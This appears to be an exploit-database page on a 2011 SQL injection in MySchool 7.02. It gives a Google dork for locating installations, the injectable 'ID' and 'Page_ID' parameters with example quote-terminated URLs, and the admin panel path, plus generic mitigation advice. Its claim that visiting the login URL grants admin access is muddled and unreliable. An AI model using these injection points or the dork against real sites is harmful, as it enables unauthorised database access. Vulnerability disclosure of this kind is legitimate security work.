header-logo
Suggest Exploit
vendor:
MySchool
by:
az7rb
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: MySchool
Affected Version From: 07.02
Affected Version To: 07.02
Patch Exists: NO
Related CWE: N/A
CPE: a:em:myschool:7.02
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3, BackTrack 5
2011

SQL Injection MySchool Version 7.02

MySchool Version 7.02 is vulnerable to SQL Injection. An attacker can inject malicious SQL queries via the 'ID' and 'Page_ID' parameters in the 'index.php' and 'show_page.php' scripts respectively. An attacker can exploit this vulnerability to gain access to the administrative control panel by entering the URL 'http://localhost/myschool/login.php'.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

Exploit Title: SQL Injection MySchool Version 7.02
################################################## 
# Google Dork: "MySchool Version 7.02"
# Date: 05-21-2011
# Software Link: http://em.com.eg/
# Version: Version 7.02
# Author: az7rb
# Tested on : winxp sp3 Ar end bt5 
# Homepage : www.p0c.cc 
# Greetz : p0c Team & Dr.NaNo & All My Msn Messenger Friends
################################################## 
################################################## 
#################### wWw.p0c.cc #####################
################################################## 
# SQL :
# 
http://localhost/myschool/index.php?do=show_details&ID=[sql] 
# Example :
# 
http://localhost/myschool/index.php?do=show_details&ID=29' 
# SQL 2 :
#  
http://localhost/myschool/show_page.php?Page_ID=[sql] 
# Example :
#  
http://localhost/myschool/show_page.php?Page_ID=&table=users' 
# Link Control Panel :
http://localhost/myschool/login.php
##################################################